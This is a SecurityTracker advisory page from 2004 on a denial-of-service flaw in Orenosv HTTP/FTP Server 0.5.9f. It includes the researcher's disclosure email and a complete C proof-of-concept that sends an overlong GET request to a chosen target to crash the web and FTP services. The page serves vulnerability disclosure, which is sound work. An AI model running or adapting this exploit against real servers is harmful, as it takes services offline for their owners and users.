SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Orenosv HTTP/FTP Server Vendors:   Kataoka, Masato
Orenosv HTTP/FTP Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1010289
SecurityTracker URL:  http://securitytracker.com/id/1010289
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 26 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.5.9f
Description:   badpack3t of SP Research Labs reported a vulnerability in Orenosv Server. A remote user can cause the web and FTP service to stop responding.

It is reported that a remote user can send a specially crafted HTTP GET request for a resource of 420 characters to cause the HTTP service and the FTP service to stop processing traffic.

A demonstration exploit is provided in the Source Message.

The original advisory is available at:

http://security-protocols.com/modules.php?name=News&file=article&sid=1987

Impact:   A remote user can cause the application to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  hp.vector.co.jp/authors/VA027031/orenosv/index_en.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Orenosv HTTP/FTP Server Denial Of Service


This is a multi-part message in MIME format.
--------------080903010107000907060809
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Please publish:

http://security-protocols.com/modules.php?name=News&file=article&sid=1987

Or the attached advisory.

Thanks,

----------------------------------------
badpack3t
www.security-protocols.com
----------------------------------------




--------------080903010107000907060809
Content-Type: text/plain;
 name="sp-x13-advisory.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="sp-x13-advisory.txt"

SP Research Labs Advisory x13
-----------------------------

Orenosv HTTP/FTP Server Denial Of Service
-----------------------------------------

Versions:
orenosv059f

Vendor:
http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

Date Released - 5.25.2004

------------------------------------
Product Description from the vendor:

Orenosv is an HTTP/FTP/FTPS server running on Windows NT 4.0, Windows 2000 and Windows XP platforms.
Orenosv is a freely distributable software.

--------
Details:

A specifically crafted HTTP GET request which contains 420 A's will cause the HTTP and FTP service
to stop responding.  

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the orenosv service to crash.

--------------
Tested on: 
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************/
   PoC to crash the server
/****************************/

/* Orenosv HTTP/FTP Server Denial Of Service
   
   Version:
   orenosv059f
  
   Vendor:
   http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

   Coded and Discovered by:
   badpack3t <badpack3t@security-protocols.com>
   .:sp research labs:.
   www.security-protocols.com
   5.25.2004
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

/* 420 A's - looks ugly but owell */
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n"; 

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n", argv[0]); 
		printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]);
		printf("www.security-protocols.com\r\n\r\n", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];
	port = 9999;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failed\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Payload...\n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payload\r\n");
		closesocket(mysocket);
		exit(1);
	}

	printf("Payload has been sent! Check if the webserver is dead.\r\n");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}

--------------080903010107000907060809--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC